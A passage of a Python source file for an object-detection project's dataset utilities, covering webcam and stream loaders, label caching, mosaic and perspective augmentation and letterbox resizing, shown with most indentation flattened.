self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
            pipe = int(pipe)  # local camera index (avoid eval on input)
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
print(f'{i + 1}/{n}: {s}... ', end='')
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
            s = int(s) if s.isnumeric() else s  # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {self.fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
success, im = cap.retrieve()
self.imgs[index] = im if success else self.imgs[index] * 0
n = 0
time.sleep(1 / self.fps) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return ['txt'.join(x.replace(sa, sb, 1).rsplit(x.split('.')[-1], 1)) for x in img_paths]
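# Illustrative worked example (paths are hypothetical, shown for a POSIX
# system): the substitution above swaps the first '/images/' path segment
# for '/labels/' and the image suffix for '.txt', e.g.
#   img2label_paths(['data/images/train/im0.jpg'])
#   -> ['data/labels/train/im0.txt']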
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
        bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index (np.int is deprecated)
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
        nm, nf, ne, nc = 0, 0, 0, 0  # number missing, found, empty, corrupt
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
try:
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
except Exception as e:
logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # path not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
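# Note on the two collate functions above: both write the batch image index
# into column 0 of every label row, so the concatenated targets tensor has
# rows of the form [image_index, class, x, y, w, h] and build_targets() can
# route each label back to its image after stacking.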
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
img = cv2.resize(img, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
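# Illustrative usage sketch: augment_hsv modifies its BGR image in place via
# the three lookup tables above, so nothing is returned (dummy data only).
def _example_augment_hsv():
    im = np.full((4, 4, 3), 128, dtype=np.uint8)  # tiny dummy BGR image
    augment_hsv(im, hgain=0.015, sgain=0.7, vgain=0.4)
    return im  # the same array, augmented in place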
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
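# Note: the 4-mosaic above pastes each image into one quadrant of a 2s x 2s
# canvas around a random centre (xc, yc); padw/padh are the offsets that
# shift each image's labels from image coordinates into mosaic coordinates
# before random_perspective crops the border back off.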
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
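# Worked example: letterboxing a 1080x1920 (h x w) frame to 640 with
# auto=True gives r = 1/3 and new_unpad = (640, 360); the height padding is
# mod(640 - 360, 32) = 24 px, split as 12 px of grey on top and bottom to
# satisfy the stride-32 constraint.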
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
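# Worked example: a 100x40 box that warping shrinks to 30x4 passes the
# wh_thr and aspect-ratio tests (ar = 7.5 < 20) but fails the area test
# (30*4 / (100*40) = 0.03 < 0.10), so box_candidates filters it out.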
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
